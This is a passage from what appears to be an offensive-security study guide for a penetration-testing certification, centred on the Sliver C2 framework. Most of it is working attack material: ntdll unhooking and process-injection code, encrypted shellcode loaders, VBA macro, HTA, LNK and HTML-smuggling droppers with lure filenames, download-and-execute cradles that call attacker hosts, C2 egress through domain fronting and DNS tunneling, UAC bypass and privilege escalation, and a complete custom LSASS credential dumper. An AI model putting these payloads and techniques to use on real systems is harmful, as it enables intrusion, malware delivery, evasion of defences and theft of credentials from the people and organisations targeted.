        IntPtr sectionHeader = ntdllBase + peOffset + 0x18 + optHeaderSize;

        for (int i = 0; i < numSections; i++)
        {
            byte[] nameBytes = new byte[8];
            Marshal.Copy(sectionHeader, nameBytes, 0, 8);
            string name = System.Text.Encoding.ASCII.GetString(nameBytes).Trim('\0');

            if (name == ".text")
            {
                int virtualSize = Marshal.ReadInt32(sectionHeader + 8);
                int virtualAddr = Marshal.ReadInt32(sectionHeader + 12);
                int rawDataPtr = Marshal.ReadInt32(sectionHeader + 20);

                IntPtr dest = ntdllBase + virtualAddr;
                uint oldProtect;
                VirtualProtect(dest, (UIntPtr)virtualSize, 0x40, out oldProtect);
                Marshal.Copy(cleanNtdll, rawDataPtr, dest, virtualSize);
                VirtualProtect(dest, (UIntPtr)virtualSize, oldProtect, out oldProtect);
                break;
            }
            sectionHeader += 40; // IMAGE_SECTION_HEADER size
        }
    }
}

Process Injection Techniques

Theory

Process injection runs your code inside a different (legitimate) process, blending with normal activity and inheriting that process's token.

TechniqueStealthComplexityDetection Surface
CreateRemoteThreadLowLowHooked heavily by EDR
APC/Early BirdMediumMediumLess commonly hooked
Process HollowingMediumHighNtUnmapViewOfSection + WriteProcessMemory
Shellcode Injection (NtCreateSection)HighHighUses native NT APIs

Sliver Built-in Injection

# Inject shellcode into a running process (by PID)
sliver (IMPLANT) > execute-shellcode -p <PID> /path/to/shellcode.bin

# Spawn a new sacrificial process and inject into it
sliver (IMPLANT) > execute-shellcode --loot-name mysc /path/to/shellcode.bin

# Migrate implant to another process
sliver (IMPLANT) > migrate <PID>

# Sideload a DLL into the implant process (reflective load)
sliver (IMPLANT) > sideload /path/to/payload.dll EntryPoint

# Execute a BOF (Beacon Object File — in-process, no new thread)
sliver (IMPLANT) > execute-bof /path/to/bof.o [args]

CreateRemoteThread (Classic — for reference)

// Classic pattern: OpenProcess → VirtualAllocEx → WriteProcessMemory → CreateRemoteThread
// Heavily monitored — use only as fallback or for understanding

[DllImport("kernel32.dll")] static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
[DllImport("kernel32.dll")] static extern IntPtr VirtualAllocEx(IntPtr hProc, IntPtr addr, uint size, uint type, uint prot);
[DllImport("kernel32.dll")] static extern bool WriteProcessMemory(IntPtr hProc, IntPtr addr, byte[] buf, uint size, out UIntPtr written);
[DllImport("kernel32.dll")] static extern IntPtr CreateRemoteThread(IntPtr hProc, IntPtr attr, uint stackSz, IntPtr startAddr, IntPtr param, uint flags, IntPtr threadId);

// Usage:
IntPtr hProc = OpenProcess(0x001F0FFF, false, targetPid);  // PROCESS_ALL_ACCESS
IntPtr allocAddr = VirtualAllocEx(hProc, IntPtr.Zero, (uint)shellcode.Length, 0x3000, 0x40);
WriteProcessMemory(hProc, allocAddr, shellcode, (uint)shellcode.Length, out _);
CreateRemoteThread(hProc, IntPtr.Zero, 0, allocAddr, IntPtr.Zero, 0, IntPtr.Zero);

Early Bird APC Injection

// Create a suspended process, queue an APC to the main thread, then resume
// The shellcode executes before any EDR hooks are applied to the new process

[DllImport("kernel32.dll")] static extern bool CreateProcess(/*...*/);
[DllImport("kernel32.dll")] static extern IntPtr VirtualAllocEx(/*...*/);
[DllImport("kernel32.dll")] static extern bool WriteProcessMemory(/*...*/);
[DllImport("kernel32.dll")] static extern uint QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData);
[DllImport("kernel32.dll")] static extern uint ResumeThread(IntPtr hThread);

// 1. CreateProcess with CREATE_SUSPENDED (0x4)
// 2. VirtualAllocEx in the new process
// 3. WriteProcessMemory (shellcode)
// 4. QueueUserAPC(allocAddr, pi.hThread, IntPtr.Zero)
// 5. ResumeThread(pi.hThread)

Process Hollowing

// 1. CreateProcess with CREATE_SUSPENDED
// 2. NtUnmapViewOfSection — unmap the legitimate image
// 3. VirtualAllocEx — allocate at the original image base
// 4. WriteProcessMemory — write your PE/shellcode
// 5. SetThreadContext — point EIP/RIP to your entry point
// 6. ResumeThread

// Tools that automate this: Donut (converts PE to shellcode that does this internally)

Custom Shellcode Loaders

Theory

The loader is the code that allocates memory, decrypts shellcode, and executes it. This is where most evasion engineering happens. The loader itself must also avoid detection.

C# Shellcode Loader (AES Encrypted)

using System;
using System.IO;
using System.Runtime.InteropServices;
using System.Security.Cryptography;

namespace Loader
{
    class Program
    {
        [DllImport("kernel32.dll")] static extern IntPtr VirtualAlloc(IntPtr addr, uint size, uint type, uint prot);
        [DllImport("kernel32.dll")] static extern IntPtr CreateThread(IntPtr attr, uint stackSz, IntPtr startAddr, IntPtr param, uint flags, IntPtr threadId);
        [DllImport("kernel32.dll")] static extern uint WaitForSingleObject(IntPtr hHandle, uint ms);

        static byte[] Decrypt(byte[] encrypted, byte[] key, byte[] iv)
        {
            using (Aes aes = Aes.Create())
            {
                aes.Key = key; aes.IV = iv;
                ICryptoTransform dec = aes.CreateDecryptor();
                return dec.TransformFinalBlock(encrypted, 0, encrypted.Length);
            }
        }

        static void Main(string[] args)
        {
            // Embed or fetch encrypted shellcode
            byte[] encrypted = Convert.FromBase64String("<BASE64_ENCRYPTED_SHELLCODE>");
            byte[] key = Convert.FromBase64String("<BASE64_KEY>");
            byte[] iv = Convert.FromBase64String("<BASE64_IV>");

            byte[] shellcode = Decrypt(encrypted, key, iv);

            IntPtr addr = VirtualAlloc(IntPtr.Zero, (uint)shellcode.Length, 0x3000, 0x40);
            Marshal.Copy(shellcode, 0, addr, shellcode.Length);
            IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
            WaitForSingleObject(hThread, 0xFFFFFFFF);
        }
    }
}

PowerShell Shellcode Loader (XOR + Download)

# Download XOR-encrypted shellcode and execute in-memory
$url = "http://<IP>/sliver.bin.enc"
$key = 0x35

# Download
$wc = New-Object System.Net.WebClient
$enc = $wc.DownloadData($url)

# Decrypt
$buf = New-Object byte[] $enc.Length
for ($i = 0; $i -lt $enc.Length; $i++) {
    $buf[$i] = $enc[$i] -bxor $key
}

# Allocate and execute
$size = $buf.Length
[IntPtr]$addr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer(
    (Get-ProcAddr kernel32.dll VirtualAlloc),
    [Func[IntPtr,UInt32,UInt32,UInt32,IntPtr]]
).Invoke([IntPtr]::Zero, $size, 0x3000, 0x40)
[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $addr, $size)

# ... (invoke via delegate)

C++ Loader with Syscalls (Advanced — SysWhispers3)

# 1. Generate syscall stubs with SysWhispers3
$ python3 syswhispers.py --preset common -o syscalls
# Generates syscalls.h, syscalls.c, syscalls-asm.x64.asm

# 2. Include in your C++ loader project
# 3. Call NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx
#    directly via the generated stubs — completely bypasses ntdll hooks

Client-Side Code Execution (Initial Access)

Theory

OSEP initial access focuses on phishing with macro-enabled documents, HTA files, and LNK abuse. The goal is to get code execution on a workstation to establish a C2 channel.

VBA Macro — Shellcode Runner

' AutoOpen macro — downloads and executes Sliver shellcode
' Save as .doc (not .docx) — macros require the older format or .docm

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    Dim Shell As Object
    Set Shell = CreateObject("Wscript.Shell")
    ' Download cradle — pulls Sliver stager or PowerShell loader
    Shell.Run "powershell.exe -nop -w hidden -enc <BASE64_PAYLOAD>", 0
End Sub

VBA Macro — In-Memory Shellcode Injection

' Allocate memory, copy shellcode, and execute via API calls
' Shellcode should be XOR-encoded to avoid static detection

Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal lpAddr As LongPtr, ByVal dwSize As Long, ByVal flAllocType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal dest As LongPtr, ByRef src As Any, ByVal length As Long) As LongPtr
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal lpThreadAttr As Long, ByVal dwStackSize As Long, ByVal lpStartAddr As LongPtr, ByVal lpParam As Long, ByVal dwCreateFlags As Long, ByRef lpThreadId As Long) As LongPtr

Sub AutoOpen()
    Dim buf As Variant
    Dim addr As LongPtr
    Dim counter As Long
    Dim data As Long

    ' XOR-encoded Sliver shellcode (split across lines to reduce sig)
    buf = Array(232, 130, 0, 0, ...)   ' <-- embed your encoded shellcode array here

    addr = VirtualAlloc(0, UBound(buf), &H3000, &H40)

    For counter = LBound(buf) To UBound(buf)
        data = buf(counter) Xor 35   ' XOR key = 0x23
        RtlMoveMemory addr + counter, data, 1
    Next counter

    CreateThread 0, 0, addr, 0, 0, 0
End Sub

HTA Payload

<!-- payload.hta — executes PowerShell download cradle -->
<html>
<head>
<script language="VBScript">
Sub RunPayload
    Set shell = CreateObject("Wscript.Shell")
    shell.Run "powershell -nop -w hidden -enc <BASE64_PAYLOAD>", 0
    window.close
End Sub
</script>
</head>
<body onload="RunPayload">
</body>
</html>
# Deliver HTA via mshta
mshta http://<IP>/payload.hta

# Or embed in phishing email as link

LNK Abuse

# Create a malicious .lnk file that runs PowerShell
$shortcut = (New-Object -ComObject WScript.Shell).CreateShortcut("C:\Users\Public\Document.lnk")
$shortcut.TargetPath = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
$shortcut.Arguments = "-nop -w hidden -enc <BASE64_PAYLOAD>"
$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,1"  # Word icon
$shortcut.WorkingDirectory = "C:\Users\Public"
$shortcut.Save()

Embedding Sliver Shellcode in Office Documents via Donut

# 1. Generate Sliver shellcode
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format shellcode --save /tmp/sliver.bin

# 2. XOR encrypt
$ python3 xor_encrypt.py /tmp/sliver.bin  # produces sliver.bin.enc

# 3. Base64 encode for VBA embedding
$ base64 -w 0 /tmp/sliver.bin.enc > /tmp/sliver_b64.txt

# 4. Embed in VBA macro using the shellcode runner template above
# OR host on web server and use download cradle

Client-Side Code Execution with JScript/VBScript

Theory

Windows Script Host (WSH) can execute JScript (.js) and VBScript (.vbs) files natively via wscript.exe or cscript.exe. These are powerful initial access vectors because they don't require Office and can be delivered directly as file attachments (though many email providers now block .js/.vbs — use HTML smuggling or .iso/.zip wrapping).

VBScript Payload Runner

' payload.vbs — download and execute via WScript.Shell
Dim shell
Set shell = CreateObject("Wscript.Shell")
shell.Run "powershell -nop -w hidden -enc <BASE64_SLIVER_STAGER>", 0

JScript Shellcode Runner

// payload.js — download shellcode and execute in-memory using ActiveX
// Uses DotNetToJScript technique to load .NET assembly from JScript

// Simple download & execute
var shell = new ActiveXObject("WScript.Shell");
shell.Run("powershell -nop -w hidden -enc <BASE64_PAYLOAD>", 0, false);

JScript with Serialized .NET Object (DotNetToJScript)

// Uses James Forshaw's DotNetToJScript to deserialize a .NET assembly
// which then executes shellcode — no powershell.exe needed

// 1. Create a C# class library with shellcode runner
// 2. Use DotNetToJScript tool to generate .js file
// https://github.com/tyranid/DotNetToJScript

// Build the DotNetToJScript command:
// DotNetToJScript.exe ShellcodeRunner.dll --lang=JScript --ver=v4 -o runner.js

// The generated .js file contains a serialized .NET object that
// loads and executes your shellcode when run via wscript/cscript

JScript with ActiveXObject for Shellcode Execution

// payload.js — In-memory shellcode execution using Excel.Application COM
// Leverages Excel's ExecuteExcel4Macro to run shellcode via XLM macros
// Or use the WScript.Shell + rundll32 approach:

var wsh = new ActiveXObject("WScript.Shell");

// Download encrypted shellcode, decrypt, inject via rundll32
// Stage 1: Download
var xhr = new ActiveXObject("MSXML2.XMLHTTP");
xhr.open("GET", "http://<IP>/payload.bin", false);
xhr.send();

// Stage 2: Save to temp
var stream = new ActiveXObject("ADODB.Stream");
stream.Open();
stream.Type = 1; // binary
stream.Write(xhr.responseBody);
stream.SaveToFile("C:\\Windows\\Temp\\update.bin", 2);
stream.Close();

// Stage 3: Execute via rundll32 or custom loader
wsh.Run("rundll32 C:\\Windows\\Temp\\update.dll,EntryPoint", 0, false);

Windows Script Host (WSH) Execution Methods

# Execute .vbs or .js files
wscript payload.vbs          # GUI mode (no console window)
cscript payload.js           # Console mode

# Execute .wsf (Windows Script File — can mix JScript and VBScript)
wscript payload.wsf

# Execute via shortcut / double-click
# Embed in .lnk with target: wscript.exe C:\path\to\payload.js

# Execute via HTA (HTML Application — can contain VBScript or JScript)
mshta payload.hta
mshta http://<IP>/payload.hta
mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -enc <B64>"":close")
mshta javascript:a=new%20ActiveXObject("WScript.Shell");a.Run("powershell -enc <B64>",0);close();

Delivering JScript/VBScript via Containers (Bypass Mark-of-the-Web)

# Modern Windows blocks scripts downloaded from the internet (MOTW)
# Wrap in containers that strip the MOTW flag:

# 1. ISO/IMG file (auto-mounts as virtual drive on double-click)
# Create ISO with payload inside:
$ mkisofs -o delivery.iso -V "Documents" payload.js README.txt

# 2. ZIP file (may or may not strip MOTW depending on unzip method)

# 3. VHD/VHDX file
# Create VHD, mount, copy payload, detach, deliver

HTML Smuggling

Theory

HTML smuggling embeds a payload inside an HTML file using JavaScript. When the target opens the HTML file (via email or browser), JavaScript reconstructs the binary payload client-side from base64/encoded data and triggers a download. This bypasses email gateways, web proxies, and network-level inspection because the payload never crosses the wire in its original form — only the HTML file does.

HTML Smuggling — Drop EXE

<!-- smuggle.html — reconstruct and download a binary from embedded base64 -->
<html>
<head><title>Document Loading...</title></head>
<body>
<p>Please wait while your document is loading...</p>
<script>
// Base64-encoded Sliver implant (generate with: base64 -w 0 sliver.exe)
var b64 = "<BASE64_ENCODED_PAYLOAD>";

// Decode
var byteChars = atob(b64);
var byteArray = new Uint8Array(byteChars.length);
for (var i = 0; i < byteChars.length; i++) {
    byteArray[i] = byteChars.charCodeAt(i);
}

// Create blob and trigger download
var blob = new Blob([byteArray], {type: "application/octet-stream"});
var url = URL.createObjectURL(blob);
var a = document.createElement("a");
a.href = url;
a.download = "Important_Document.exe";  // Or .iso, .zip, .msi
document.body.appendChild(a);
a.click();

// Auto-cleanup
setTimeout(function() { URL.revokeObjectURL(url); }, 1000);
</script>
</body>
</html>

HTML Smuggling — Drop ISO Containing JScript

<!-- Drops an ISO which, when mounted, contains a .js payload -->
<!-- This double-wrapping bypasses MOTW and email filters -->
<html>
<body>
<script>
// Base64-encoded .iso containing payload.js inside
var b64 = "<BASE64_ISO>";
var byteChars = atob(b64);
var byteArray = new Uint8Array(byteChars.length);
for (var i = 0; i < byteChars.length; i++) {
    byteArray[i] = byteChars.charCodeAt(i);
}
var blob = new Blob([byteArray], {type: "application/octet-stream"});
var url = URL.createObjectURL(blob);
var a = document.createElement("a");
a.href = url;
a.download = "Invoice_Q3.iso";
document.body.appendChild(a);
a.click();
</script>
</body>
</html>

Generating the Payload for Smuggling

# 1. Generate Sliver implant or JScript/VBS payload
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format exe --save /tmp/implant.exe

# 2. Base64 encode it
$ base64 -w 0 /tmp/implant.exe > /tmp/implant_b64.txt

# 3. Paste into the HTML smuggling template above

# 4. For ISO wrapping (bypasses MOTW):
$ mkisofs -o /tmp/delivery.iso -V "Docs" /tmp/payload.js /tmp/readme.txt
$ base64 -w 0 /tmp/delivery.iso > /tmp/iso_b64.txt
# Paste into the ISO-dropping HTML template

# 5. Host the HTML file or send as email attachment
$ python3 -m http.server 80
# Or attach smuggle.html directly to phishing email

Bypassing Network Filters

Theory

In hardened environments, outbound traffic is restricted. Common restrictions: only HTTP/HTTPS allowed through a web proxy, DNS filtered, direct connections blocked. PEN-300 covers techniques to get C2 traffic through these restrictions.

Domain Fronting

Theory:
- Domain fronting hides the true C2 destination behind a legitimate CDN domain
- The outer TLS SNI and DNS point to a legitimate domain (e.g., allowed.cloudfront.net)
- The inner HTTP Host header points to your C2 (e.g., evil.cloudfront.net)
- The CDN routes the request based on the Host header, not SNI
- Network filters see traffic to a legitimate CDN domain and allow it

Requirements:
- A CDN provider that allows domain fronting (many have blocked this)
- Your C2 domain registered on the same CDN

# Sliver HTTPS listener with domain fronting
# Configure your CDN to point to your Sliver server
# Generate implant using the fronted domain

sliver > https --lhost 0.0.0.0 --lport 443 --domain <YOUR_CDN_DOMAIN>
sliver > generate beacon --http <LEGITIMATE_CDN_DOMAIN> --os windows --format exe --save /tmp/fronted.exe

# Note: The implant connects to the legitimate CDN domain (passes proxy/firewall)
# but the Host header routes traffic to your C2 behind the CDN

DNS Tunneling

# When only DNS (port 53) is allowed outbound, use DNS-based C2

# Sliver DNS listener
sliver > dns --domains c2.yourdomain.com --lport 53

# Generate DNS beacon
sliver > generate beacon --dns c2.yourdomain.com --os windows --arch amd64 --format exe --save /tmp/dns_beacon.exe

# DNS requires NS records pointing to your server:
# c2.yourdomain.com   NS   ns1.yourdomain.com
# ns1.yourdomain.com  A    <YOUR_SERVER_IP>

# Verify DNS resolution from server:
$ dig @ns1.yourdomain.com test.c2.yourdomain.com +short
# Should return 0.0.0.0 if Sliver DNS listener is working

# Alternatively: use dnscat2 or iodine for raw DNS tunnels
$ dnscat2-server c2.yourdomain.com
# On target:
$ dnscat2 c2.yourdomain.com

Proxy-Aware Payloads

# Corporate networks often require an authenticated proxy for outbound HTTP/HTTPS
# Sliver HTTPS implants are proxy-aware by default (use system proxy settings)

# Generate HTTPS beacon (automatically uses target's proxy settings)
sliver > generate beacon --http <DOMAIN>:443 --os windows --arch amd64 --format exe --save /tmp/proxy_beacon.exe

# Meterpreter proxy-aware payload
$ msfvenom -p windows/x64/meterpreter/reverse_https LHOST=<DOMAIN> LPORT=443 HttpProxyHost=<PROXY_IP> HttpProxyPort=<PROXY_PORT> -f exe -o met_proxy.exe

# PowerShell proxy-aware download cradle
$wc = New-Object System.Net.WebClient
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials
IEX $wc.DownloadString('https://<DOMAIN>/payload.ps1')

Sliver C2 Profile Customization (HTTP)

# Sliver supports custom HTTP C2 profiles to mimic legitimate traffic
# Profiles are JSON files that configure request/response patterns

# List available profiles
sliver > http-c2 list

# Import a custom profile
sliver > http-c2 import /path/to/profile.json

# Example: making C2 traffic look like normal web browsing
# Customize: URL paths, headers, cookies, request/response body encoding
# Profile paths: .js, .css, .png file extensions blend with web traffic

SSH Tunneling (Egress via SSH)

# If SSH outbound is allowed (port 22), tunnel C2 through it
# On your server: ensure SSH is running

# From compromised host — local port forward
$ ssh -L 8888:127.0.0.1:8888 user@<OPERATOR_IP> -N -f

# From compromised host — dynamic SOCKS proxy
$ ssh -D 1080 user@<OPERATOR_IP> -N -f

# Then configure Sliver implant or tools to use localhost:1080 as SOCKS proxy

Kiosk Breakouts

Theory

Kiosk systems are locked-down Windows machines running a single application in full-screen mode (ATMs, POS terminals, info kiosks, hospital workstations). The goal is to escape the kiosk application to access the underlying OS. PEN-300 covers several breakout techniques.

Common Breakout Techniques

1. Dialog Box Abuse
   - Trigger a File Open/Save/Print dialog from within the kiosk app
   - Use the dialog's address bar or navigation pane to browse the filesystem
   - Navigate to C:\Windows\System32\cmd.exe and execute it

2. Keyboard Shortcuts
   - Try: Win+R (Run), Win+E (Explorer), Ctrl+Alt+Del, Ctrl+Shift+Esc (Task Manager)
   - Win+X, Win+U (Accessibility), F1 (Help → links to explorer)
   - Alt+F4 (close kiosk app), Ctrl+O / Ctrl+S (Open/Save dialogs)
   - Alt+Tab, Alt+Esc (switch windows)
   - Sticky Keys: press Shift 5 times → may launch sethc.exe dialog

3. Help Menu / About Dialog
   - Access Help (F1) or About from the kiosk application
   - Help windows often contain hyperlinks → click to open IE/Edge
   - From browser → navigate to file:///C:/Windows/System32/cmd.exe

4. Print Dialog
   - Print from within the kiosk app
   - "Print to File" may let you write to arbitrary locations
   - "Microsoft Print to PDF" → opens file save dialog → filesystem access

5. Right-Click Context Menus
   - If right-click is not fully disabled, context menus may offer "Open with..."
   - May allow launching Explorer or other programs

6. Browser-Based Kiosks
   - URL bar access → file:///C:/ → browse filesystem
   - JavaScript console (F12 / Ctrl+Shift+I) → run commands
   - about:blank → inject HTML form that triggers file dialog
   - Edge/Chrome: edge://settings, chrome://settings → may have download capability

Kiosk Breakout Commands

# Once you have a file dialog or explorer access:

# Navigate to and execute
C:\Windows\System32\cmd.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

# Use UNC paths if local paths are blocked
\\127.0.0.1\C$\Windows\System32\cmd.exe

# Create a batch file via Notepad (if accessible from dialog)
# In file dialog address bar, type: notepad
# In Notepad, type: cmd.exe
# Save as: C:\Windows\Temp\shell.bat
# Navigate to and execute the .bat file

# Environment variable tricks (if the path C:\Windows is blocked)
%SYSTEMROOT%\System32\cmd.exe
%COMSPEC%

# Explorer address bar shortcuts
shell:startup          # Startup folder (persistence)
shell:sendto
shell:system           # System32 folder

Post-Breakout (Get C2 Access)

# Once you have cmd/powershell, download and execute your implant:
cmd> certutil -urlcache -split -f http://<IP>/sliver.exe C:\Windows\Temp\s.exe
cmd> C:\Windows\Temp\s.exe

# Or PowerShell download cradle
powershell -nop -w hidden -enc <BASE64_SLIVER_STAGER>

# If no outbound internet, try USB (if ports are accessible)
# Or check network config for pivoting opportunities
cmd> ipconfig /all
cmd> netstat -anop tcp

Host Reconnaissance

# From Sliver implant — enumerate system info
sliver (IMPLANT) > info
sliver (IMPLANT) > whoami
sliver (IMPLANT) > getuid
sliver (IMPLANT) > getpid
sliver (IMPLANT) > getenv        # environment variables
sliver (IMPLANT) > ifconfig      # network interfaces
sliver (IMPLANT) > netstat       # connections

# List processes (look for AV/EDR: MsMpEng.exe, CrowdStrike, SentinelOne, etc.)
sliver (IMPLANT) > ps

# Screenshot
sliver (IMPLANT) > screenshot

# Execute .NET assemblies (Seatbelt for full host enum)
sliver (IMPLANT) > execute-assembly /tools/Seatbelt.exe -group=all

# Specific Seatbelt checks
sliver (IMPLANT) > execute-assembly /tools/Seatbelt.exe AntiVirus
sliver (IMPLANT) > execute-assembly /tools/Seatbelt.exe AppLocker
sliver (IMPLANT) > execute-assembly /tools/Seatbelt.exe WindowsDefender
sliver (IMPLANT) > execute-assembly /tools/Seatbelt.exe PowerShellSettings
sliver (IMPLANT) > execute-assembly /tools/Seatbelt.exe OSInfo
sliver (IMPLANT) > execute-assembly /tools/Seatbelt.exe TokenPrivileges
sliver (IMPLANT) > execute-assembly /tools/Seatbelt.exe WindowsVault

# Using Sliver extensions / BOFs
sliver (IMPLANT) > armory install sa-whoami
sliver (IMPLANT) > armory install sa-netlocalgroup
sliver (IMPLANT) > sa-whoami
sliver (IMPLANT) > sa-netlocalgroup administrators

# Meterpreter fallback for host recon
meterpreter > sysinfo
meterpreter > run post/multi/recon/local_exploit_suggester
meterpreter > run post/windows/gather/enum_applications

Privilege Escalation (Windows)

Theory

Common privesc vectors in OSEP: service misconfigurations (unquoted paths, weak permissions), token impersonation (SeImpersonate), UAC bypass, and kernel exploits.

Enumeration

# SharpUp — find exploitable misconfigurations
sliver (IMPLANT) > execute-assembly /tools/SharpUp.exe audit

# PowerUp (via PowerShell or Sliver's shell)
sliver (IMPLANT) > shell
PS> IEX(New-Object Net.WebClient).DownloadString('http://<IP>/PowerUp.ps1')
PS> Invoke-AllChecks

# WinPEAS (use .NET or .bat version)
sliver (IMPLANT) > execute-assembly /tools/winPEASx64.exe

# Check token privileges
sliver (IMPLANT) > execute-assembly /tools/Seatbelt.exe TokenPrivileges

Unquoted Service Path

sliver (IMPLANT) > execute-assembly /tools/SharpUp.exe audit UnquotedServicePath

# Find the writable directory in the unquoted path
sliver (IMPLANT) > shell
cmd> icacls "C:\Program Files\Vulnerable Services"

# Upload Sliver service binary (generate with --format service)
sliver > generate --mtls <IP>:8888 --os windows --arch amd64 --format service --save /tmp/svc.exe
sliver (IMPLANT) > upload /tmp/svc.exe "C:\Program Files\Vulnerable Services\Service.exe"

# Restart the service
sliver (IMPLANT) > shell
cmd> sc stop VulnService1
cmd> sc start VulnService1

Weak Service Permissions (Modify service config)

sliver (IMPLANT) > execute-assembly /tools/SharpUp.exe audit ModifiableServices

# Reconfigure the service binary path
sliver (IMPLANT) > shell
cmd> sc config VulnService2 binPath= "C:\Windows\Temp\svc.exe"
cmd> sc stop VulnService2
cmd> sc start VulnService2

Token Impersonation (SeImpersonatePrivilege)

# Check for SeImpersonate (common on service accounts, IIS, MSSQL)
sliver (IMPLANT) > shell
cmd> whoami /priv

# Use PrintSpoofer
sliver (IMPLANT) > upload /tools/PrintSpoofer64.exe C:\Windows\Temp\ps.exe
sliver (IMPLANT) > shell
cmd> C:\Windows\Temp\ps.exe -i -c "C:\Windows\Temp\sliver.exe"

# Use GodPotato / SweetPotato / JuicyPotatoNG
sliver (IMPLANT) > execute-assembly /tools/SweetPotato.exe -p C:\Windows\Temp\sliver.exe

# Meterpreter fallback — getsystem
meterpreter > getsystem

UAC Bypass

# Check if user is in local Administrators but running non-elevated
sliver (IMPLANT) > shell
cmd> whoami /groups
# Look for "Medium Mandatory Level" — means UAC is blocking elevation

# Use SharpBypassUAC or UACME
sliver (IMPLANT) > execute-assembly /tools/SharpBypassUAC.exe

# Fodhelper bypass (manual)
sliver (IMPLANT) > shell
cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /d "C:\Windows\Temp\sliver.exe" /f
cmd> reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /t REG_SZ /f
cmd> C:\Windows\System32\fodhelper.exe

Credential Theft

# --- From Sliver session (requires SYSTEM or admin) ---

# Dump SAM database (local accounts)
sliver (IMPLANT) > execute-assembly /tools/SharpSecDump.exe -target=localhost

# Run Mimikatz via execute-assembly (use SharpKatz or SafetyKatz)
sliver (IMPLANT) > execute-assembly /tools/SafetyKatz.exe "sekurlsa::logonpasswords"
sliver (IMPLANT) > execute-assembly /tools/SafetyKatz.exe "sekurlsa::ekeys"
sliver (IMPLANT) > execute-assembly /tools/SafetyKatz.exe "lsadump::sam"
sliver (IMPLANT) > execute-assembly /tools/SafetyKatz.exe "lsadump::cache"

# Use SharpKatz (pure C# mimikatz)
sliver (IMPLANT) > execute-assembly /tools/SharpKatz.exe --Command logonpasswords

# Dump LSASS via MiniDumpWriteDump and process offline
sliver (IMPLANT) > execute-assembly /tools/SharpMiniDump.exe
# Download dump file and process with mimikatz offline
sliver (IMPLANT) > download C:\Windows\Temp\debug.dmp

# Rubeus — dump Kerberos tickets
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe triage
sliver (IMPLANT) > execute-assembly /tools/Rubeus.exe dump /luid:0x14794e /service:krbtgt /nowrap

# DCSync (requires Domain Admin or equivalent replication rights)
sliver (IMPLANT) > execute-assembly /tools/SharpKatz.exe --Command dcsync --User krbtgt --Domain <DOMAIN>

# --- From Linux (Impacket) via Sliver pivot ---
$ proxychains secretsdump.py <DOMAIN>/<USER>:'<PASSWORD>'@<DC_IP>
$ proxychains secretsdump.py <DOMAIN>/<USER>@<DC_IP> -hashes :<NTLM_HASH>

# --- Meterpreter fallback ---
meterpreter > hashdump
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > kerberos_ticket_list

Custom C# MiniDump Tool (OSEP Exam Technique)

Theory: AV often flags known tools like Mimikatz and SharpMiniDump. OSEP expects you to write your own LSASS dumper using MiniDumpWriteDump from dbghelp.dll via P/Invoke. The dump is created on disk (or in memory), then transferred offline for analysis with Mimikatz. This bypasses signature-based detections.

// CustomMiniDump.cs — Compile with: csc /target:exe /out:CustomMiniDump.exe CustomMiniDump.cs
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;

namespace CustomMiniDump
{
    class Program
    {
        // P/Invoke MiniDumpWriteDump from dbghelp.dll
        [DllImport("dbghelp.dll", SetLastError = true)]
        static extern bool MiniDumpWriteDump(
            IntPtr hProcess,
            uint processId,
            IntPtr hFile,
            uint dumpType,
            IntPtr exceptionParam,
            IntPtr userStreamParam,
            IntPtr callbackParam);

        // MiniDumpWithFullMemory = 0x00000002
        const uint MiniDumpWithFullMemory = 0x00000002;

        static void Main(string[] args)
        {
            // Find LSASS
            Process[] processes = Process.GetProcessesByName("lsass");
            if (processes.Length == 0)
            {
                Console.WriteLine("[-] LSASS not found");
                return;
            }

            Process lsass = processes[0];
            Console.WriteLine($"[+] Found LSASS PID: {lsass.Id}");

            // Open process handle
            IntPtr hProcess = lsass.Handle;

            // Create dump file
            string dumpPath = Path.Combine(
                Environment.GetEnvironmentVariable("TEMP"),
                "debug64.dmp");

            using (FileStream fs = new FileStream(dumpPath, FileMode.Create))
            {
                bool success = MiniDumpWriteDump(
                    hProcess,
                    (uint)lsass.Id,
                    fs.SafeFileHandle.DangerousGetHandle(),
                    MiniDumpWithFullMemory,
                    IntPtr.Zero,
                    IntPtr.Zero,
                    IntPtr.Zero);

                if (success)
                    Console.WriteLine($"[+] Dump written to: {dumpPath}");
                else
                    Console.WriteLine($"[-] MiniDumpWriteDump failed: {Marshal.GetLastWin32Error()}");
            }
        }
    }
}
# Cross-compile on Linux (using mono)
$ mcs /target:exe /out:CustomMiniDump.exe CustomMiniDump.cs

# Use from Sliver
sliver (IMPLANT) > execute-assembly /tools/CustomMiniDump.exe
sliver (IMPLANT) > download C:\Users\<USER>\AppData\Local\Temp\debug64.dmp

# Process the dump offline with Mimikatz
mimikatz # sekurlsa::minidump debug64.dmp
mimikatz # sekurlsa::logonpasswords

# Alternative: XOR-encode the dump before download to evade AV scanning
// Enhanced version: XOR the dump bytes before writing
byte[] dumpBytes = File.ReadAllBytes(dumpPath);
byte key = 0x41;
for (int i = 0; i < dumpBytes.Length; i++)
    dumpBytes[i] ^= key;
File.WriteAllBytes(dumpPath + ".enc", dumpBytes);
